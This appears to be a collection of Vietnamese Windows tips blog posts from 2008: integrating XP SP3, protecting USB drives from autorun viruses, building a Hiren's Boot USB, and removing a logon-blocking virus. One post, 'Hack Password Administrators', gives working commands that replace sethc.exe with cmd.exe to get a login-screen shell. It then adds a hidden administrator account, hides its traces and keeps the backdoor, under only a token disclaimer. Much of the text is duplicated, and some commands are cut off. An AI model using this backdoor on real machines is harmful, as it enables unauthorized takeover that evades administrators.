Vào Run gõ :
regsvr32 /n /i:U shell32
Chờ một lát , máy sẽ hiện lại biểu tượng như cũ .
Thứ Bảy, 14 tháng 6, 2008
Thứ Sáu, 9 tháng 5, 2008
Tích hợp XP Sp3
Key để cài y hệt như key cài XP SP2.
Việc làm 1 CD cài Win đã tích hợp SP3 rất dễ, gồm 3 bước:
Bước 1: Dùng UltraISO để extract phần boot từ CD cài Win (CD chưa tích hợp SP3) để lấy file boot.bif
Bước 2: Integrate SP3 vào bộ cài:
- Tạo thư mục Source trong ổ D hay C. Copy tất cả nội dung của dĩa cài Win SP2 đến thư mục này (Ví dụ D:\Source).
- Download file cài service pack 3 bằng link này xong thì rename nó thành tên SP3. Đặt nó trong thư mục gốc của ổ D (D:\SP3)
- Run --- > cmd để mở command promt. Từ dấu nhắc Dos type D: rồi gõ Enter để chuyển về thư mục gốc của ổ D.
- Type dòng lệnh: SP3/integrate:D:\Source (chú ý không có khoảng space). Quá trình extract file SP3 và integrate nó vào thư mục cài Win (Source) sẽ diễn ra rất nhanh, khoảng 3 phút là hoàn tất. Khi xong nó xuất hiện hộp thoại thông báo Finish. Nhấn OK để Finish. Từ dấu nhắc Dos type lệnh exit để thoát Command Promt.
Bước 3: Dùng UltraISO làm CD cài win có thể boot
- Mở UltraISO. Sau đó load boot file từ file boot.bif mà mình đã extract từ CD cài ở bước 1.
- Thêm toàn bộ nội dung của folder Source đến cửa sổ UltraISO. Cuối cùng save file tên WINSP3.iso
- Cuối cùng là burn file WINSP3.iso này ra CD
CD này có thể boot và cài giống như CD cài Win bình thường. Sau khi cài sẽ là Windows Service Pack 3
Nếu bạn nào muốn đơn giản thì nên dùng Nlite. Tôi thì không thích dùng Nlite vì nó thay đổi size của bộ cài quá nhiều.
Rất tiếc tôi không thể post hình minh họa lên vì không hiểu sao tôi không thể post hình được
Chúc thành công
Việc làm 1 CD cài Win đã tích hợp SP3 rất dễ, gồm 3 bước:
Bước 1: Dùng UltraISO để extract phần boot từ CD cài Win (CD chưa tích hợp SP3) để lấy file boot.bif
Bước 2: Integrate SP3 vào bộ cài:
- Tạo thư mục Source trong ổ D hay C. Copy tất cả nội dung của dĩa cài Win SP2 đến thư mục này (Ví dụ D:\Source).
- Download file cài service pack 3 bằng link này xong thì rename nó thành tên SP3. Đặt nó trong thư mục gốc của ổ D (D:\SP3)
- Run --- > cmd để mở command promt. Từ dấu nhắc Dos type D: rồi gõ Enter để chuyển về thư mục gốc của ổ D.
- Type dòng lệnh: SP3/integrate:D:\Source (chú ý không có khoảng space). Quá trình extract file SP3 và integrate nó vào thư mục cài Win (Source) sẽ diễn ra rất nhanh, khoảng 3 phút là hoàn tất. Khi xong nó xuất hiện hộp thoại thông báo Finish. Nhấn OK để Finish. Từ dấu nhắc Dos type lệnh exit để thoát Command Promt.
Bước 3: Dùng UltraISO làm CD cài win có thể boot
- Mở UltraISO. Sau đó load boot file từ file boot.bif mà mình đã extract từ CD cài ở bước 1.
- Thêm toàn bộ nội dung của folder Source đến cửa sổ UltraISO. Cuối cùng save file tên WINSP3.iso
- Cuối cùng là burn file WINSP3.iso này ra CD
CD này có thể boot và cài giống như CD cài Win bình thường. Sau khi cài sẽ là Windows Service Pack 3
Nếu bạn nào muốn đơn giản thì nên dùng Nlite. Tôi thì không thích dùng Nlite vì nó thay đổi size của bộ cài quá nhiều.
Rất tiếc tôi không thể post hình minh họa lên vì không hiểu sao tôi không thể post hình được
Chúc thành công
Thứ Sáu, 2 tháng 5, 2008
Giúp USB chống lại virus autorun
Giúp USB chống lại virus autorun
(Dân trí) - Thủ thuật nhỏ này tuy không ngăn chặn được toàn bộ các loại virus lây lan qua USB nhưng cũng hạn chế được một phần nào sức tấn công, bảo vệ cho USB cũng như máy tính của bạn.
Hiện nay, các loại virus lây lan qua USB khá phổ biến, có nhiều biển thể khác nhau. Tuy vậy, một phần lớn trong số đó đều có một đặc điểm chung là sẽ tạo ra một file autorun tự khởi động ngay khi người sử dụng kết nối USB với máy tính và từ đó lây lan ra toàn máy cũng như các máy tính liên kết trong mạng.
Một các giải quyết khá đơn giản cho vấn đề này là chúng ta sẽ tạo ra một file chạy autorun mặc định trước cho USB với những khả năng không bị đánh bật ra khi các loại virus xâm nhập và tự tạo file chạy của riêng nó.
Bước 1: Với thế hệ ổ flash USB có dung lượng lớn hiện nay đều có thể chuyển sang định dạng NTFS thay cho mặc định FAT/FAT32. Với định dạng NTFS, hệ thống của USB sẽ được bảo mật chặt chẽ hơn, với việc chia quyền truy cập cấp cao. Chọn Start vào Run sau đó gõ: Convert: /FS:NTFS. Ví dụ ổ USB của bạn là ổ D thì gõ như sau: Convert D: /FS:NTFS. Cách này có thể áp dụng cho cả ổ cứng. Một cách đơn giản hơn là click chuột phải vào biểu tượng USB trong My Computer, chọn Format, trong phần định dạng ổ thì chuyển sang NTFS nhưng với thao tác này dữ liệu của bạn sẽ bị xóa hết do đó hãy sao lưu những gì quan trọng trước khi làm.
Bước 2: Tạo một file autorun.inf bất kỳ, nhớ rằng chỉ cần đặt tên file là như vậy, còn nội dung bạn có thể bỏ không. Tiếp đó click chuột phải vào file vừa tạo ra và chọn thuộc tính read-only để không thể sửa đổi những nội dung của file này.
Bước 3: Để tăng tính bảo mật hơn nữa của file autorun.inf vừa tạo ra, chúng ta sẽ cấm mọi quyền truy xuất đến tập tin này bằng cách vào Run thực hiện: cacls\autorun.inf /D Everyone. Ví dụ USB của bạn là ổ D, ta sẽ có: cacls D: \autorun.inf/D Everyone. Rồi sau đó chọn chế độ hidden cho file chạy này.
Quốc Tú
(Dân trí) - Thủ thuật nhỏ này tuy không ngăn chặn được toàn bộ các loại virus lây lan qua USB nhưng cũng hạn chế được một phần nào sức tấn công, bảo vệ cho USB cũng như máy tính của bạn.
Hiện nay, các loại virus lây lan qua USB khá phổ biến, có nhiều biển thể khác nhau. Tuy vậy, một phần lớn trong số đó đều có một đặc điểm chung là sẽ tạo ra một file autorun tự khởi động ngay khi người sử dụng kết nối USB với máy tính và từ đó lây lan ra toàn máy cũng như các máy tính liên kết trong mạng.
Một các giải quyết khá đơn giản cho vấn đề này là chúng ta sẽ tạo ra một file chạy autorun mặc định trước cho USB với những khả năng không bị đánh bật ra khi các loại virus xâm nhập và tự tạo file chạy của riêng nó.
Bước 1: Với thế hệ ổ flash USB có dung lượng lớn hiện nay đều có thể chuyển sang định dạng NTFS thay cho mặc định FAT/FAT32. Với định dạng NTFS, hệ thống của USB sẽ được bảo mật chặt chẽ hơn, với việc chia quyền truy cập cấp cao. Chọn Start vào Run sau đó gõ: Convert
Bước 2: Tạo một file autorun.inf bất kỳ, nhớ rằng chỉ cần đặt tên file là như vậy, còn nội dung bạn có thể bỏ không. Tiếp đó click chuột phải vào file vừa tạo ra và chọn thuộc tính read-only để không thể sửa đổi những nội dung của file này.
Bước 3: Để tăng tính bảo mật hơn nữa của file autorun.inf vừa tạo ra, chúng ta sẽ cấm mọi quyền truy xuất đến tập tin này bằng cách vào Run thực hiện: cacls
Quốc Tú
Tạo USB boot bằng Hiren Boot
January 25, 2008
Tạo USB boot bằng Hiren Boot
Sưu tầm ở báo www.echip.com.vn
Ổ đĩa di động USB Flash drive hiện nay rất thông dụng vì gọn nhẹ, ít hư hỏng và dung lượng cao nên rất thuận tiện để làm đĩa khởi động và cứu hộ máy tính, thay thế cho đĩa mềm hay CDROM. Ngoài ra, nếu ổ USB Flash drive của bạn có dung lượng trên 125MB, bạn có thể đưa toàn bộ nội dung của Hiren’s BootCD vào ổ USB. Dưới đây là các bước để làm ổ USB của bạn khởi động được.
Khởi động DOS
1. Tải file hình ảnh của đĩa mềm khởi động DOS tại địa chỉ www.echip.com.vn/echiproot/Softwares/2006/bootdos.img rồi dùng chương trình WinImage (www.winimage.com/winimage.htm) để trích xuất các file có trong đĩa mềm này. Chạy WinImage > mở menu File/ Open và chỉ định file bootdos.img > chọn tất cả file trong cửa sổ liệt kê bên phải rồi bấm phím phải chuột vào chúng > chọn Extract trong menu ngữ cảnh để xuất toàn bộ file ra thư mục A.
2. Tải chương trình HP USB Disk Storage Format Tool tại http://h18007.www1.hp.com/support/files/hpcpqdt/us/download/20306.html > gắn ổ USB vào máy rồi chạy chương trình này để định dạng cho ổ USB với các chọn lựa: FAT cho phần File system, đánh dấu chọn Create a DOS startup disk và chỉ định thư mục A tại phần Using DOS system files located at: > bấm nút Start để chương trình tiến hành định dạng và chép 3 file hệ thống (command.com, io.sys, msdos.sys) lên ổ USB.
3. Bạn chép các file còn lại trong thư mục A vào ổ USB và có thể chép thêm các chương trình cần thiết chạy trong môi trường DOS như kiểm tra phần cứng, phân vùng đĩa, phục hồi dữ liệu… tùy theo dung lượng còn trống của ổ USB.
Khởi động Hiren’s Boot
Nếu ổ USB của bạn có dung lượng trên 128MB thì bạn có thể đưa cả bộ Hiren’s Boot vào ổ USB theo các bước dưới đây.
1, 2. Thực hiện bước 1 và 2 giống như trên.
3. Xóa file msdos.sys và bỏ thuộc tính ẩn, hệ thống của file command.com trên ổ USB.
4. Tải file ISO của Hiren’s Boot v7.8 tại địa chỉ www.9down.com/downloads.php?fileid=288 hay mua đĩa Hiren’s Boot ở các cửa hàng dịch vụ Tin học rồi dùng chương trình UltraISO (www.ezbsystems.com/ultraiso/index.html) để tạo file hình ảnh dạng ISO cho đĩa này (chạy UltraISO, vào menu Tools chọn lệnh Make CD/DVD Image).
5. Chạy UltraISO, mở menu File/ Open và chọn file ISO của Hiren’s Boot > Mở menu Bootable, chọn Save Boot File để trích xuất phần Boot của đĩa thành file tên hiren.bif vào 1 thư mục tạm > Bấm phím phải chuột vào thư mục BootCD rồi chọn Extract To để xuất toàn bộ thư mục này vào thư mục B trên ổ cứng.
6. Chạy chương trình WinImage, mở menu File/ Open và chỉ định file hiren.bif > chọn tất cả file trong cửa sổ liệt kê bên phải rồi bấm phím phải chuột vào chúng > chọn Extract trong menu ngữ cảnh để xuất toàn bộ file ra thư mục B.
7. Xóa file command.com, io.sys, jo.sys trong thư mục B đồng thời mở file msdos.sys trong thư mục này để xóa 3 dòng: “windir=.” , “WinBootDir=.” và “HostWinBootDrv=a”.
8. Chép tất cả file trong thư mục B, kể cả thư mục BootCD vào ổ USB. Như vậy là ổ USB Flash drive của bạn đã trở thành Hiren’s BootUSB rồi đó.
Cần biết khi sử dụng ổ USB Boot.
- Nên sao lưu nội dung trên ổ USB để dự phòng vì ổ USB vẫn có thể bị xóa hay bị virus tấn công.
- Phải xác lập việc khởi động bằng ổ USB trong BIOS và có những máy đời cũ không hỗ trợ ổ USB Boot.
- Ổ USB khởi động tương tự ổ cứng nên phần Boot không chiếm ký tự của ổ đĩa mềm (A) như khi khởi động bằng ổ CD-ROM.
- Tốc độ khởi động của ổ Hiren’s BootUSB chậm hơn đĩa Hiren’s BootCD và có thể không khởi động được trên một số máy laptop.
Tạo USB boot bằng Hiren Boot
Sưu tầm ở báo www.echip.com.vn
Ổ đĩa di động USB Flash drive hiện nay rất thông dụng vì gọn nhẹ, ít hư hỏng và dung lượng cao nên rất thuận tiện để làm đĩa khởi động và cứu hộ máy tính, thay thế cho đĩa mềm hay CDROM. Ngoài ra, nếu ổ USB Flash drive của bạn có dung lượng trên 125MB, bạn có thể đưa toàn bộ nội dung của Hiren’s BootCD vào ổ USB. Dưới đây là các bước để làm ổ USB của bạn khởi động được.
Khởi động DOS
1. Tải file hình ảnh của đĩa mềm khởi động DOS tại địa chỉ www.echip.com.vn/echiproot/Softwares/2006/bootdos.img rồi dùng chương trình WinImage (www.winimage.com/winimage.htm) để trích xuất các file có trong đĩa mềm này. Chạy WinImage > mở menu File/ Open và chỉ định file bootdos.img > chọn tất cả file trong cửa sổ liệt kê bên phải rồi bấm phím phải chuột vào chúng > chọn Extract trong menu ngữ cảnh để xuất toàn bộ file ra thư mục A.
2. Tải chương trình HP USB Disk Storage Format Tool tại http://h18007.www1.hp.com/support/files/hpcpqdt/us/download/20306.html > gắn ổ USB vào máy rồi chạy chương trình này để định dạng cho ổ USB với các chọn lựa: FAT cho phần File system, đánh dấu chọn Create a DOS startup disk và chỉ định thư mục A tại phần Using DOS system files located at: > bấm nút Start để chương trình tiến hành định dạng và chép 3 file hệ thống (command.com, io.sys, msdos.sys) lên ổ USB.
3. Bạn chép các file còn lại trong thư mục A vào ổ USB và có thể chép thêm các chương trình cần thiết chạy trong môi trường DOS như kiểm tra phần cứng, phân vùng đĩa, phục hồi dữ liệu… tùy theo dung lượng còn trống của ổ USB.
Khởi động Hiren’s Boot
Nếu ổ USB của bạn có dung lượng trên 128MB thì bạn có thể đưa cả bộ Hiren’s Boot vào ổ USB theo các bước dưới đây.
1, 2. Thực hiện bước 1 và 2 giống như trên.
3. Xóa file msdos.sys và bỏ thuộc tính ẩn, hệ thống của file command.com trên ổ USB.
4. Tải file ISO của Hiren’s Boot v7.8 tại địa chỉ www.9down.com/downloads.php?fileid=288 hay mua đĩa Hiren’s Boot ở các cửa hàng dịch vụ Tin học rồi dùng chương trình UltraISO (www.ezbsystems.com/ultraiso/index.html) để tạo file hình ảnh dạng ISO cho đĩa này (chạy UltraISO, vào menu Tools chọn lệnh Make CD/DVD Image).
5. Chạy UltraISO, mở menu File/ Open và chọn file ISO của Hiren’s Boot > Mở menu Bootable, chọn Save Boot File để trích xuất phần Boot của đĩa thành file tên hiren.bif vào 1 thư mục tạm > Bấm phím phải chuột vào thư mục BootCD rồi chọn Extract To để xuất toàn bộ thư mục này vào thư mục B trên ổ cứng.
6. Chạy chương trình WinImage, mở menu File/ Open và chỉ định file hiren.bif > chọn tất cả file trong cửa sổ liệt kê bên phải rồi bấm phím phải chuột vào chúng > chọn Extract trong menu ngữ cảnh để xuất toàn bộ file ra thư mục B.
7. Xóa file command.com, io.sys, jo.sys trong thư mục B đồng thời mở file msdos.sys trong thư mục này để xóa 3 dòng: “windir=.” , “WinBootDir=.” và “HostWinBootDrv=a”.
8. Chép tất cả file trong thư mục B, kể cả thư mục BootCD vào ổ USB. Như vậy là ổ USB Flash drive của bạn đã trở thành Hiren’s BootUSB rồi đó.
Cần biết khi sử dụng ổ USB Boot.
- Nên sao lưu nội dung trên ổ USB để dự phòng vì ổ USB vẫn có thể bị xóa hay bị virus tấn công.
- Phải xác lập việc khởi động bằng ổ USB trong BIOS và có những máy đời cũ không hỗ trợ ổ USB Boot.
- Ổ USB khởi động tương tự ổ cứng nên phần Boot không chiếm ký tự của ổ đĩa mềm (A) như khi khởi động bằng ổ CD-ROM.
- Tốc độ khởi động của ổ Hiren’s BootUSB chậm hơn đĩa Hiren’s BootCD và có thể không khởi động được trên một số máy laptop.
Chủ Nhật, 6 tháng 4, 2008
Hack Password Administrators (Mr.Cuong@banbeit.com)
Hack Password Administrators
Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift nhiều lần (khoảng 5 lần)thì chương trình này sẽ hiện ra
File thực thi của chương trình này là c:\windows\system32\sethc.exe
Chúng ta sẽ Hack pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Chà...chà...hack pass Quản Trị thôi!
Thực hiện theo các bước sau:
Bước 1:
Run: cmd
gõ vào các dòng lệnh sau:(khuyến khích nên gõ cho quen lệnh)
cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe
(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó nhấp kép chuột lên file crack.cmd để thực thi.)
Bước 2:
Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng Command Run
Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!
Bước 3:Một số lệnh Command:
Xem những user nào hiện có trên máy (kể cả các user ần)
net user
Xóa trắng password của Administrator(hay tương tự với bất kì user nào):
net user Administrator cái này thì ko nên tí nào! dễ lộ lắm!hehe..
Thêm tài khoản MrCuong với pw là happend vào hệ thống
net user MrCuong happend /add
Gán tài khoản MrCuong vào nhóm Quản Trị :
net localgroup Administrators MrCuong /add
Sau khi thực hiện các lệnh trên thì MrCuong đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.
net user MrCuong /delete
Ẩn profile ứng với tài khoản MrCuong(xóa thì lâu lắm)
attrib +s +h +r C:\Documents and Settings\MrCuong
Với những Quản Trị Viên chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe...
.
Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác!
Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift nhiều lần (khoảng 5 lần)thì chương trình này sẽ hiện ra
File thực thi của chương trình này là c:\windows\system32\sethc.exe
Chúng ta sẽ Hack pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Chà...chà...hack pass Quản Trị thôi!
Thực hiện theo các bước sau:
Bước 1:
Run: cmd
gõ vào các dòng lệnh sau:(khuyến khích nên gõ cho quen lệnh)
cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe
(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó nhấp kép chuột lên file crack.cmd để thực thi.)
Bước 2:
Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng Command Run
Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!
Bước 3:Một số lệnh Command:
Xem những user nào hiện có trên máy (kể cả các user ần)
net user
Xóa trắng password của Administrator(hay tương tự với bất kì user nào):
net user Administrator cái này thì ko nên tí nào! dễ lộ lắm!hehe..
Thêm tài khoản MrCuong với pw là happend vào hệ thống
net user MrCuong happend /add
Gán tài khoản MrCuong vào nhóm Quản Trị :
net localgroup Administrators MrCuong /add
Sau khi thực hiện các lệnh trên thì MrCuong đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.
net user MrCuong /delete
Ẩn profile ứng với tài khoản MrCuong(xóa thì lâu lắm)
attrib +s +h +r C:\Documents and Settings\MrCuong
Với những Quản Trị Viên chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe...
.
Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác!
Thứ Hai, 10 tháng 3, 2008
Cách diệt virus không cho logon
Nhiều khả năng công ty của bạn bị con virus Misa hoặc biến thể của nó
Mixa_I.exe có biểu tượng 1 cô gái đang nhảy đầm (ặc..ặc… )gây ra một sốhiện tương sau đây:
regedit hoặc gpedit.msc• Run thì logoff máy tính
• Chép autorun.inf và mixa_I vào tất cả các ổ đĩa
• Tạo Value Virus : C:\windows\mixa.exe
Thay đổi giá trị khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Từ giá tri "Userinit":C:\WINDOWS\system32\userinit.exe,"
thành "Userinit":"C:\WINDOWS\system32\systemio.exe," do đó nếu ko am hiểu registry sẽ khó diệt được con này!
-Đặc biệt:sau vài lần restart máy thì sẽ không log on vào win đc nữa, bị log off liên tục!
…còn hiện tương gì nữa thì..hạ hồi phân giải nhá!hehehe…quan trọng nhất là…..-->
Cách diệt như sau:
Cách 1: Do con virus không cho vào Windows nữa nên chúng ta cần dùng đến đĩa CD
-Dùng đĩa Hiren’s Boot :sử dụng DOS có hỗ trợ NTFS (nếu ổ đĩa của bạn chia theo định dạng này)
+ Xóa tất cả các file autorun.inf, Mixa_I.exe trong tất cả các ổ đĩa
+ Xóa C:\Windows\Mixa.exe
+ Xóa C:\Windows\System32\systemio.exe
+ Copy C:\Windows\System32\Userinit.exe sang ổ D:\Userinit.exe
+ Đổi tên D:\Userinit.exe thành D:\systemio.exe
+ Move D:\systemio.exe sang C:\Windows\System32\
-Khởi động Windows: lúc này bạn đã có thể log on vào windows đc rồi đấy!
+ Run: regedit.exe tìm đến khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
xóa Value “virus” bên phải.
Tiếp tục tìm đến HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Winlogon, nhìn sang phải :nhấp đúp vào “Userinit” thay đổi vềgiá trị mặc định “C:\Windows\System32\Userinit,” ( lưu ý: có dấu phẩy sau cùng! )
-Vào C:\Windows\System32\ xóa systemio.exe
Cách 2:
Muốn diệt được con này,trước tiên các bạn phải có 1 đĩa BartPE và cách diệt của nó cũng nằm ở đây : http://windowsxp.mvps.org/peboot.htm .Các bạn down BartPE về, dùng đĩa win bạn đang xài để tạo 1 file .iso sau đó các bạn dùng chương trình để burn file .iso đó ra đĩa cd,vậy là các bạn đã có 1 OS mini on CD rồi nhé,tiếp đến các bạn cho boot từ cd để chạy win mini (OS BartPE) rồi làm theo hướng dẫn:
(mọi người tham khảo tiếng Anh trước nhé):
Scenario - Incorrect registry value preventing you from logging on to your user account in Windows XP ?
In this example, a basic BartPE CD without any Plugins, has been used for illustration purposes. You may add as many Plugins as you want, depending upon your needs.
Verifying and fixing the Userinit value in the registry
1. Insert the BartPE CD into the drive, and boot the system from the CD. Once the file loading phase is over, the Bart PE desktop will be visible, as shown in Figure 1.
2. Type Regedit.exe in the prompt, and press Enter. Select the HKEY_USERS hive
3. From the File menu, choose the Load Hive option. Browse to your Windows installation drive, for example the following location:
C:\Windows\System32\Config\
4. Select the file named SOFTWARE (the file without any extensions), and click Open
5. Type a name for the hive that you've loaded now. (Example: MyXPHive)
6. Now the SOFTWARE hive is loaded, and present under the HKEY_USERS base hive.
7. In order to fix the Userinit value in the loaded hive, navigate to the following location:
HKEY_USERS \ MyXPHive \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon
8. Double-click Userinit and set it's value correctly. Example: Set it's data as follows:
C:\Windows\System32\Userinit.exe,
(Include the trailing comma also. The above assumes that Windows is installed in C:\Windows, and Userinit.exe file is actually present in the System32 folder. You may want to verify that as well.)
9. After entering the correct data, you MUST unload the Hive. To do so, select MyXPHive branch, and then in the File menu, choose Unload Hive. It's important to note that you'll need to select the MyXPHive branch first, before unloading it.
10. Quit BartPE and restart Windows. See if you're able to logon to your profile.
If your PC is a victim of the Malware discussed in this article, and unable to login to your profile, then you'll need to fix the registry as discussed there. As you're unable to login, registry modification can only be done from a remote system, or via offline registry editing. This article discusses about offline registry editing.
Cách khác :
SỬ DỤNG RECOVERY CONSOLE
Bước 1. Thay thế, đổi tên tập tin userinit.exe bằng Recovery Console.
Khởi động máy với đĩa CD cài đặt Windows. Nhấn phím bất kỳ khi xuất hiện thông báo Press any key to boot from CD.
Trong màn hình Welcome to setup, nhấn phím R (Repair) để khởi động Recovery Console (RC).
Nếu hệ thống cài đặt nhiều hệ điều hành (HĐH) khác nhau, chọn HĐH bị lỗi cần khắc phục (lưu ý: nếu nhấn Enter khi chưa chọn HĐH, chương trình sẽ tự khởi động lại máy).
Nhập mật khẩu của tài khoản thuộc nhóm quản trị (Administrators).
Tại dấu nhắc của RC, gõ các dòng lệnh sau (nhấn Enter sau mỗi dòng lệnh).
cd system32
copy userinit.exe wsaupdater.exe
exit
Bước 2. Khởi động lại máy tính, bạn đã có thể đăng nhập Windows ở chế độ bình thường.
Chọn Start. Run, gõ dòng lệnh regedit và nhấn OK để mở cửa sổ Registry Editor.
Trong khung trái Registry Editor, tìm đến nhánh HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Ở khung phải, tìm đến mục userinit, nhấn phải chuột trên mục này chọn modify.
Thay thế tập tin wsaupdater.exe bằng userinit.exe, (bao gồm cả dấu “,”) trong mục Value data (thông tin đúng trong trường hợp này là C:\WINDOWS\system32\userinit.exe,) (hình 1)
Chọn OK và đóng Registry Editor.
Bước 3. Xóa tập tin wsaupdater.exe
Khởi động lại máy tính, đăng nhập Windows bằng tài khoản thuộc nhóm quản trị (Administrators).
Chọn Start. Run, gõ dòng lệnh %Windir%\system32, nhấn OK (hoặc mở Windows Explorer, tìm đến thư mục Windows\System32)
Tìm tập tin wsaupdater.exe trong thư mục Windows\System32, chọn Delete, nhấn OK xác nhận xóa.
Ghi chú. Việc chỉnh sửa các thông số Registry đòi hỏi phải được thực hiện hết sức cẩn trọng vì chỉ một sơ suất nhỏ cũng có thể khiến Windows hoạt động bất thường, thậm chí không thể đăng nhập được. Do vậy, trước khi tiến hành bất kỳ một chỉnh sửa nào, hãy sao lưu lại cấu hình Registry hiện tại theo các hướng dẫn trong bài “Chăm sóc và bảo dưỡng Windows Registry” (ID: A0205_90).
Thông tin khác :
Hôm nay em search ở google thì tìm thấy thông tin về hiện tượng này ở trang của Microsoft, nó đây:
CAUSE
Wsaupdater.exe is spyware that changes Userinit.exe, to Wsaupdater.exe in the registry. Ad-Aware by Lavasoft removes the Wsaupdater.exe file from the computer, but it cannot change the registry subkey back to Userinit.exe,. The registry subkey that is changed is
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Value: Userinit
Data: %Windir%\System32\Wsaupdater.exe
Note %windir% represents the location of the System32 folder. For example, if the location is C:\Windows\System32, the data would be C:\Windows\System32\Wsaupdater.exe.
The data should contain Userinit.exe, instead of Wsaupdater.exe. In the previous example, the data would be C:\Windows\System32\Userinit.exe,.
Như vậy nguyên nhân là do con Wsaupdater.exe gây ra, nhưng trong bài hướng dẫn của Microsoft chỉ nói cách sửa lại Registry và xóa file Wsaupdater.exe trong thư mục system32. Điều em hỏi là: Nguyên nhân do đâu mà con Wsaupdater.exe nó chui vào thư mục System32 được, và liệu nếu chỉ xóa 1 file Wsaupdater.exe thì nó có chết ko hay còn các biến thể khác, hiện máy em cài Bitdefender10, có lúc lại cài NOD32, nhưng rốt cục quét ko thấy virus hay spyware, em chưa thử các phần mềm AntiSpy. Bác nào biết cách diệt con này thì post lên anh em xem với
Tuyệt chiêu của Mr Cường :
Virus Mixa_I từ những ngày đầu xuất hiện, tôi đã có source và thấy nó khá nguy hiểm nên đã viết bài hướng dẫn trên Blog cá nhân!
Bài viết ở trên copy từ Blog của tôi nhưng rất nhiều bạn đã ko ghi nguồn gốc !! ( hỡi ôi! dân việt nam ...)
Hiện nay tôi đã có biện pháp trị các con virus không cho logon vào máy (bất kể loại nào, ko riêng gì Mixa_I )
Đặc điểm của loại virus này là thay đổi giá trị Registry tại khóa :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"Userinit"="C:\\Windows\\system32\\userinit.exe," ( có dấu " , " ở cuối )
để chỉ đến files của chính nó ( virus ).
Vậy : Ta chỉ cần chỉnh sửa giá trị Userinit về giá trị mặc định thì sẽ lại logon được!
Nhưng : làm thế nào để vào Registry khi ko logon được ?Chúng ta sẽ lơi dụng lỗ hổng của file sethc.exe ( Xem lại bài :Hack Password Administrators )
Các bước thực hiện:
B1: Khởi động từ đĩa Hiren's Boot, sử dụng chương trình quản lý file trong Hiren's Boot để vào thư mục System32
B2: Thay thế file Sethc.exe bằng cmd.exe (bằng cách gõ: copy cmd.exe sethc.exe /y)
B3: Lấy đĩa Hiren's Boot ra và Khởi động lại máy
B4: Tại cửa sổ Logon, nhấn Shilt 5 lần để hiện cửa sổ Command Line
B5: gõ vào regedit.exe
B6: Duyệt đến khóa :HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
sửa lại giá trị mặc định là:
"Userinit"="C:\\Windows\\system32\\userinit.exe,
p/s : Bạn nào ko thực hiện được thì...THANKS cho tôi ..vài trăm cái, tối nay về viết TUT có ảnh minh họa! ^^
--------------------------------------------------------------------------------
thay đổi nội dung bởi: Mr.Cuong, 02-04-2008 lúc 01:06 PM.
--------------------------------------------------------------------------------
HomePage: http://banbeit.com
Email: Mr.Cuong@banbeit.com
Mobile: 0907.527.027
________________________________________
Mixa_I.exe có biểu tượng 1 cô gái đang nhảy đầm (ặc..ặc… )gây ra một sốhiện tương sau đây:
regedit hoặc gpedit.msc• Run thì logoff máy tính
• Chép autorun.inf và mixa_I vào tất cả các ổ đĩa
• Tạo Value Virus : C:\windows\mixa.exe
Thay đổi giá trị khóa HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Từ giá tri "Userinit":C:\WINDOWS\system32\userinit.exe,"
thành "Userinit":"C:\WINDOWS\system32\systemio.exe," do đó nếu ko am hiểu registry sẽ khó diệt được con này!
